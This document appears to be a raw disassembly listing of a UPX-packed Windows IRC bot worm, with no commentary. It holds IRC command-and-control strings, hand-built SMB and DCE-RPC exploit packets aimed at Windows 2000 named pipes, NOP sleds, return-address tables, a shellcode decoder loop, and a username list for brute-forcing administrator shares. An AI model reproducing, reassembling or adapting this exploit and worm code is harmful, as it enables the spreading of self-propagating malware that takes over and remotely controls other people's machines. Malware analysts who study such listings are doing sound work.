a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Ehdword_41A0E0 dd 4950013Ah, 474Ehdword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Ehdword_41A138 dd 4556013Ah, 4F495352h, 4EhaSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43haPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset dword_43005C
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; sub_410B52+F�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0)dword_41A818 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: UPX1:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: UPX1:loc_41A8AC�j
; UPX1:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: UPX1:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: UPX1:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: UPX1:0041A8AE�j
; UPX1:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_41A8CC dd offset loc_41005C ; DATA XREF: sub_410649+449�o
dd 2 dup(0)
dword_41A8D8 dd 77F33723h ; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: UPX1:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: UPX1:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_410B52+62�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+E2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+13C�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+179�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+1B9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+216�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+348�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; sub_410B52+29B�o ...
dword_41B410 dd 2080Ah, 0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: UPX1:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: UPX1:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: UPX1:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: UPX1:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: UPX1:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: UPX1:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: UPX1:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: UPX1:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: UPX1:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: UPX1:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: UPX1:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: UPX1:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
